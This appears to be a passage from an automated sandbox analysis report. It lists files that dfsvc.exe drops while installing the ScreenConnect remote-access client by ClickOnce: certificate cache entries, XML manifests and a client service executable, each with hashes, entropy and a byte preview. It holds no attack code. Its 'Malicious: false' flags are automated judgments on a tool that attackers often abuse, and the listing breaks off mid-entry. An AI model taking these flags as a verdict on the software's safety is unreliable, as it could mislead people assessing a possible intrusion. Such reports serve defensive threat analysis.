SHA-256:	FDA5F40D0CCB09A99DB290FFC8A6220518874A5F3C1CB8154FC1F5268203BD69
SHA-512:	AB8BF33E736B6C51A83AD7239DCEA423D53DDBFEB172B591FB1E451B38B300C6A1C411F6603CC1A1B85426C19FE81F69748E3EDC5B670B42453BAF44679B46C6
Malicious:	false
Preview:	p...... .........J......(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	412
Entropy (8bit):	3.991359422503678
Encrypted:	false
SSDEEP:	12:tmpVCZiXuUmxMiv8sFBSfamB3rbFURMOlAkr:Ups4Xhmxxv7Sf13rbQJr
MD5:	7DF12777E19D5909F86D697D63C9AF36
SHA1:	4DE3FBDFC5BECEFE76E36B0438669DE9B8AF6270
SHA-256:	ADA7894617CD8D91B234C44BF24321C254B3AD1B8F2BAFA9B2F44452DCEE0116
SHA-512:	9F9CC60EB919A6FDA5751E52B33A3F3436B1731982C8416CBEC57E3FD5FA91F08721088C2A2B48661F5C6663EB168F459EDFE1D6B7BE6493B6BC24B2529C283B
Malicious:	false
Preview:	p...... ....(...h'h.....(..................xh....].......................]...... ............... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	254
Entropy (8bit):	3.0499268689312156
Encrypted:	false
SSDEEP:	6:kKHpkzLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:PpkzLYS4tWOxSW0PAMsZp
MD5:	3FA124E113A391DADE7606D1E2361E60
SHA1:	A8C81D3A810950375E9C7BC4C1DB44433C962B3B
SHA-256:	21FBB4ADEB024F5579458131B9B771098603321A02DD82B4C0BFD4662069CD11
SHA-512:	CDBE3F05EDF2540F018D65F263EF6479A18CE66123B0693B50C391FB9731DE10DF7E007FDCC13CA2C4E9E818F2B67ECCBB531C204271369E7A114CE87EB5F354
Malicious:	false
Preview:	p...... ....l...)Fd.....(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	25496
Entropy (8bit):	5.553147094050681
Encrypted:	false
SSDEEP:	384:Rlq7vjGo26tX9DkX9R/QPIBM7YsACMTH4aCaL/:RsDl26tX9DkX9R/QPI+0sA5THcar
MD5:	49DE42A8F61EF45AB9227BD7E98E00C0
SHA1:	391BA270C3F3184DAD7E7C1D7F49DDDAB15B886E
SHA-256:	DAA17656DBFF6266D1D18B5B33951195102A0E6624BA8841463BA69A58E82C4C
SHA-512:	CA8D600D77CC027312D39F309EC1D3DB29E22F2D94E03A2D4F8CBFD9C6E7123F67B1E16A1D23DAC636F870020397FB3AF40CCA9646B144A0566812DCC046F738
Malicious:	false
Preview:	PcmH..........B...f.......!...T...........................e...?....<.g..J.\|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K....u..IV..N......D..O.....E..X.R...O.&r..VzU......3LD.SY...[s.T..<\...........`.......=...P...S...V...Z...].......,.......L.......T.......\.......`.......\|...........................................@.......0...........<.......T.......h.......\|...0.......................................0...........<.......T.......h.......\|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
Category:	dropped
Size (bytes):	17866
Entropy (8bit):	5.954687824833028
Encrypted:	false
SSDEEP:	384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
MD5:	1DC9DD74A43D10C5F1EAE50D76856F36
SHA1:	E4080B055DD3A290DB546B90BCF6C5593FF34F6D
SHA-256:	291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
SHA-512:	91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	3452
Entropy (8bit):	4.335626157748952
Encrypted:	false
SSDEEP:	48:iIEfBeF7lWuWW+Lg0e6S+9owQX7g27mL438ciUcVM8Aw+ikDhIYX:iJ3uWWWeV+WwQXlmL4MckVM8Aw+rhIYX
MD5:	BA8C82944CC6C0E3AA36E5F4BD02D32C
SHA1:	BB42EF99AEBEDBD94C400FA59E0C576936B76634
SHA-256:	9B0F71A6334EE5EA0F7F5C6A86B2158D0D46261B54DEEFB7BC21EB1BEF054F17
SHA-512:	141BABB7F94682A9850930CD6AD312AD72E97583327B8763A3F6A700AFEE0CD2A385866492D34949A5A9AC802504C1E992C7505B35B80FA6C08734F257D3C545
Malicious:	false
Preview:	PcmH........<.j...].#...(.......T..........................."........<.g..J.\|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........3..L.G.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...............................................N...............................................N...............................................N...............................................N...nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............D...........MdSp(...$...(...(...#............... urn:schemas

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.1303806593325705
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
MD5:	2343364BAC7A96205EB525ADDC4BBFD1
SHA1:	9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
SHA-256:	E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
SHA-512:	AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	5260
Entropy (8bit):	4.184021961930826
Encrypted:	false
SSDEEP:	96:6Nq6R84zeV+Ww7mk9O43jYHlIgBXw0vy3mx8wnjIbm:eR840JC9tUHlXBXm4vjd
MD5:	1BFE610C37A6FE03CBE94B90C9D0528B
SHA1:	1A3C30F02CD6883437C4EA485CCD5E25D3A4D4CB
SHA-256:	359299BDBBCFF55C4783B1D1CB2362C27791A512B87DD4BBB98EFBD650F956CF
SHA-512:	CBA7D1011F802C3410707BE33A3E2FB6034E0B72F17B246D1DEA29B37BA65AA684A23E57D64C198DBB38F26D19EE6E4943B6D9CA3BDEDDD279E378329B8D728D
Malicious:	false
Preview:	PcmH..........$D.L..4...t.......T...............P...........3........<.g..J.\|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$...........3..L.G.....[.......................z..w.....[~31.X....C.........y..&..d......B(.........^.ie...u"...F.....Ey%.....E..X.(...s".I...R)....+.`...m,......;../............... ...#...&...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........l...@.......................................(........... .......(...(...<.......d.......l.......\|...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(...............d...........p...............................................N...............................................N...............................................N...............................................N.......................

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1982
Entropy (8bit):	5.057585371364542
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
MD5:	50FC8E2B16CC5920B0536C1F5DD4AEAE
SHA1:	6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
SHA-256:	95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
SHA-512:	BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	6588
Entropy (8bit):	4.1092648551780515
Encrypted:	false
SSDEEP:	96:B4MmxqeV+WwwU8WpZ2LRheuMl2UfdVaMsDksJqi/D5:2xlJwpZ2LRhyl5dVzRw75
MD5:	2960080A4546A513EB87F655B67AF100
SHA1:	D61EFD1ED8158C46A9897656C104B6D24C010326
SHA-256:	D3193E3981B45B8CE4021094120FB6B57674ECAC3B47A6908DAFA29B321433A1
SHA-512:	967D88306F488F312C4F7C3C6DEB291E614C8695EC3F18A33F95814BFAF19595F9BC850E2C5F84F01D725B0F64191B2094F74181A48EA5EF85C29CD4566F97FD
Malicious:	false
Preview:	PcmH..........H.....@...........T...............t...........?........<.g..J.\|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.........}'.d................z..w.....[~31.X....y..&..d......B(.........C....."...^.ie...u%...[s.T..<(...s".I...R)...F.....Ey,.....E..X./...f..VC..2...O.&r..Vz5......;..8.....V....X;........... ...#...&...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...X...........@........................... .......0...(...8.......`.......h.......x...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(.......................(...$.......L.......T...(...l...................(.......................(...........................................................................N.......................

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2573
Entropy (8bit):	5.026361555169168
Encrypted:	false
SSDEEP:	48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
MD5:	3133DE245D1C278C1C423A5E92AF63B6
SHA1:	D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
SHA-256:	61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
SHA-512:	B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	3032
Entropy (8bit):	4.240250296786388
Encrypted:	false
SSDEEP:	48:IMQSc2gue6S+9oww7g47JO2V42WAXznwbb:IXScUeV+WwwnJOr2WAXznEb
MD5:	A8C03C8EFDD92B21CE40FECC2E449A37
SHA1:	7E22EBDA26613859445444358E030D6907BB3766
SHA-256:	30ED9B7B4B06A6D17C48AA30C740450362F9385C7F44FF3349F414C114E7D7EC
SHA-512:	DA231D30063F39D9AD4237F0568FFC497B9C3A5F65D20970BDE68D2B7B70A8C27F7E0991B6AFC4D5D8D4FBED37430724B2221AA054FFF793B2B9408E12A32636
Malicious:	false
Preview:	PcmH........!..G.U..............T....................................<.g..J.\|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...........................................................N...............................................N...............................................N...nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............<...........MdSp ...$....... ..."............... urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1041
Entropy (8bit):	5.147328807370198
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
MD5:	2EA1AC1E39B8029AA1D1CEBB1079C706
SHA1:	5788C00093D358F8B3D8A98B0BEF5D0703031E3F
SHA-256:	8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
SHA-512:	6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	14612
Entropy (8bit):	5.807501318100555
Encrypted:	false
SSDEEP:	192:7Wh4+3n9q5s6IHoY8s8oXN8s8oTN2x2QPIlFDLhEDh7BqWoILgSl4uK:7WH9qS6ITX9dX9R/QPIBM7Y+li
MD5:	C188144BDA8F5A63DB7E140A986084FA
SHA1:	56F6A01084B089FAA1D451F876B888AEDF5E8841
SHA-256:	E28D6BE2829342D37609251A496CDD1176AD65BB43966FD55D1FE3F44AE23B5B
SHA-512:	FDBC4D107EBB70BC555644EE1B3934D837065ED13718D6516AF869A8CC6EF8ECAE12599A98369395C21B93441BCBD9321397DC1FDC576ED1F0E8AC80CAA56CC9
Malicious:	false
Preview:	PcmH..........yh..C$...@.......T...............8...........#........<.g..J.\|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$...........3..L.G..........8........R...........}'.d....j...........K...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......@8......H8......P8......p8......t8..L...\|8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%....]...Tk....Y?.Om................-........................E..................................N...4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.2.10.8991........................

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
Category:	dropped
Size (bytes):	118084
Entropy (8bit):	5.584890162201507
Encrypted:	false
SSDEEP:	3072:0aNIcT51/FXvMVNWfCXq9ymxm2o9HuzhJOvP:0FcfiVITmt8vOvP
MD5:	9F442D8293F1917B8CD6F007F3FEEBE6
SHA1:	3065E347263BFEA93CC987DF08E9630EBCF3E870
SHA-256:	CB63564F6233140A150E013346957F108A71E8B224A82FD68B6FD6418324D438
SHA-512:	58D79221BF7771535A878B11A4454BBAA75D6EFA087B4CB0DDA486E9E58A66F89D518A104AE8249471561FAC20BEBA39A5D011F4172DCFD72BAD931A26E534F0
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	4428
Entropy (8bit):	4.040260429100267
Encrypted:	false
SSDEEP:	48:GuQKXCD5v+1gLe6S+9ow87gFW75uvWbO2V42WAvf1fTO5CEkoDprOaJCf:GuvXQeV+Ww8U45ucOr2WAvFTOvkoNOrf
MD5:	BAFA0D8038589D30E1A14EF7B9A96FF1
SHA1:	ECB530C5FFC5DF2635B2201255ECE13FDA01FE5A
SHA-256:	FE94938067AFC744563D4C7D2597C5B28F1698ADCF0F225E9BE2D0F55F949563
SHA-512:	2AE1D1391D4CEFD64217A49F952ED2C94A3661828FD18083A1D2E1859C090E8E51F5D9E8C983EC8B93C7040D86E846473C8AB597F93CBF8C7B41ECB63E4E4707
Malicious:	false
Preview:	PcmH........#,..W.dV,...T.......T...............8...........+........<.g..J.\|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$...........3..L.G........6...................z..w.....[~31.X....y..&..d......B(.........[s.T..<....s".I...R......E..X.!...O.&r..Vz$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......\|...........(...............................(................... ...(...4.......\.......d...(...\|...................(...............L...........0...............................................N...............................................N...............................................N...............................................N...............................................N...............................................N...nameScreenConnect.Cl

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1636
Entropy (8bit):	5.084538887646832
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
MD5:	E11E5D85F8857144751D60CED3FAE6D7
SHA1:	7E0AE834C6B1DEA46B51C3101852AFEEA975D572
SHA-256:	ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
SHA-512:	5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	95520
Entropy (8bit):	6.505346220942731
Encrypted:	false
